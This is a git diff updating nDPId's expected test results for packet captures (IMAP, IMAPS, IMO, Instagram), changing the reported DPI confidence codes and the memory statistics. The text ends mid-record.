+00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":1580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1213095266780} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872468 bytes -~~ total memory freed........: 5872468 bytes -~~ total allocations/frees...: 118149/118149 +~~ total memory allocated....: 6006110 bytes +~~ total memory freed........: 6006110 bytes +~~ total allocations/frees...: 120911/120911 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 792 chars 
diff --git a/test/results/imaps.pcap.out b/test/results/imaps.pcap.out index 85203d0fb..1b763ff27 100644 --- a/test/results/imaps.pcap.out +++ b/test/results/imaps.pcap.out 
@@ -4,10 +4,10 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 
-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} 
+00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":3856,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1590857744987} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 
@@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874942 bytes -~~ total memory freed........: 5874942 bytes -~~ total allocations/frees...: 118140/118140 +~~ total memory allocated....: 6008576 bytes +~~ total memory freed........: 6008576 bytes +~~ total allocations/frees...: 120902/120902 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1217 chars diff --git a/test/results/imo.pcap.out b/test/results/imo.pcap.out index 0229fc7a3..846afba65 100644 --- a/test/results/imo.pcap.out +++ b/test/results/imo.pcap.out 
@@ -4,14 +4,14 @@ 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1646579366752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1646579366752,"pkt":"CL6sCxdumt9Y+uvcCABFAADkB2xAAEARIpLAqAypuZuJHsA3jrcA0NESgTwOaEjDNFXzxmxamfOGor3xFD3A7FnCXNc+hJhFKrJOPpMIHUdqj1x7ZYe+fmL104ZlZ8QSGjgMDxxGQ47M5ARZG9YmBTkKmoomp0C2r5k7+UuqXgkHofa9I06kfQJKjgPnNwBdZocQSlex2Z6G1oBdByRvxIbfLnB1AU5Z2+ssSUPzcUN05190AJa8ogAW0Cie1vmNKFuiNZVeV2v82D2eARVTcN232VacWZMHJ\/PcqQx4XLqiWe9HSh0LDQkCIZoCAAAAAAA="} 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1646579366752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1646579366752,"pkt":"CL6sCxdumt9Y+uvcCABFAAFlB21AAEARIhDAqAypuZuJHsA3jrcBUW71gkcNAABefWxEZ6P52eWWE1NsVUgX\/f\/SEU49gh0z128SrDnndBBJ7Xzv30Qrd+KJJN6jW88s97nwOxW1SXOJ19HPmvCIhrHR5EVDIS67bqqmEITlpL2AWZxihzDdfZ9+dgCuOQIy4YhI67L+NII4MlG7p6wa+Z43u8VCM7MQ94E5SdjxWl3zDFPxVycVf7KV2xCPfzi+nLVEj6bW7qHP3SW0XSDmXsZYCq\/fkVzkG6GD9VCFwOzRvPlMFOvXxrdNScJnQTp3jwA9ixJO\/EZEvZGmxF8KX1lLWK60\/AnhsK8ResfH4lG\/M+7QsKf8h+0F6\/JreyOlSKUahDlCIMAkz9CNbMMyQvDt1lT9Ujr+5G5FKQSNp7Os7CbxgGOrC+XUDj1qcRw+csAXbivPEt1405allpHSrfAa3hDWEw734vz46COasfJjrLY="} 
00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1646579366793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":53,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":53,"pkt_l4_len":19,"thread_ts_msec":1646579366793,"pkt":"mt9Y+uvcCL6sCxduCABFAAAnWnIAADIRHkm5m4kewKgMqY63wDcAEwOhAAkDIZoCAAAAAAA="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646579366752,"flow_last_seen":1646579366793,"flow_idle_time":200000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1646579366793,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646579366752,"flow_last_seen":1646579366793,"flow_idle_time":200000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1646579366793,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646579366870,"flow_last_seen":1646579366870,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1646579366870,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1646579366870,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":43,"pkt_l4_len":9,"thread_ts_msec":1646579366870,"pkt":"CL6sCxdumt9Y+uvcCABFAAAdWdFAAEARh1LAqAypXSEvOsA34QQACf3yBw=="} 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1646579366906,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":43,"pkt_l4_len":9,"thread_ts_msec":1646579366906,"pkt":"mt9Y+uvcCL6sCxduCABFAAAd07xAADYRF2ddIS86wKgMqeEEwDcACY7ydg=="} 
00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1646579366927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1646579366927,"pkt":"mt9Y+uvcCL6sCxduCABFAACH071AADYRFvxdIS86wKgMqeEEwDcAc11kag0AAJobOdZhqhsqD3t\/ZsLZznm6P+VojS4Ym286bkA4KafGXg3iLF\/wjB8hr6WLuR7MT5lbl5UGnsPZptwcvPKKbJmOyY4TOPC9kAo6L6kDDYE4iSyFwPlyWfdtSAheyL2rRrc\/cATh7Qs="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646579366870,"flow_last_seen":1646579366939,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1646579366939,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1646579366870,"flow_last_seen":1646579370091,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1052,"flow_tot_l4_payload_len":18219,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1646579366752,"flow_last_seen":1646579369944,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":1224,"flow_tot_l4_payload_len":12961,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646579366870,"flow_last_seen":1646579366939,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1646579366939,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1646579366870,"flow_last_seen":1646579370091,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1052,"flow_tot_l4_payload_len":18219,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1646579366752,"flow_last_seen":1646579369944,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":1224,"flow_tot_l4_payload_len":12961,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":31180,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1646579370091} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873403 bytes -~~ total memory freed........: 5873403 bytes -~~ total allocations/frees...: 118218/118218 +~~ total memory allocated....: 6007037 bytes +~~ total memory freed........: 6007037 bytes +~~ total allocations/frees...: 120980/120980 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 436 chars ~~ json string max len.......: 882 chars 
diff --git a/test/results/instagram.pcap.out b/test/results/instagram.pcap.out index 2bf99f23d..a03e7f144 100644 --- a/test/results/instagram.pcap.out +++ b/test/results/instagram.pcap.out 
@@ -4,71 +4,70 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRB